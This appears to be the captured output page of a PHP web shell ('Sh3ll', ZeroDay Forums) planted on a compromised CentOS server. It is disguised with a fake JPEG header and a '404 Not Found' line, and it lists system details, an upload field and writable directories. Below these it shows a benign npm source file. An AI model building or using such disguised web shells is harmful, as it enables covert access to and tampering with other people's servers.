����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /lib/node_modules/npm/lib/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //lib/node_modules/npm/lib/install/report-optional-failure.js
'use strict'
var path = require('path')
var moduleName = require('../utils/module-name.js')

module.exports = reportOptionalFailure

function top (tree) {
  if (tree.parent) return top(tree.parent)
  return tree
}

function reportOptionalFailure (tree, what, error) {
  var topTree = top(tree)
  if (!topTree.warnings) topTree.warnings = []
  var id
  if (what) {
    var depVer = tree.package.dependencies && tree.package.dependencies[what]
    var optDepVer = tree.package.optionalDependencies && tree.package.optionalDependencies[what]
    var devDepVer = tree.package.devDependencies && tree.package.devDependencies[what]
    var version = depVer || optDepVer || devDepVer
    id = what + (version ? '@' + version : '')
  } else {
    id = tree._id || moduleName(tree) + (tree.package.version ? '@' + tree.package.version : '')
  }
  var location = path.relative(topTree.path, tree.path)
  if (what) location = path.join(location, 'node_modules', what)

  error.optional = id
  error.location = location
  topTree.warnings.push(error)
}

ZeroDay Forums Mini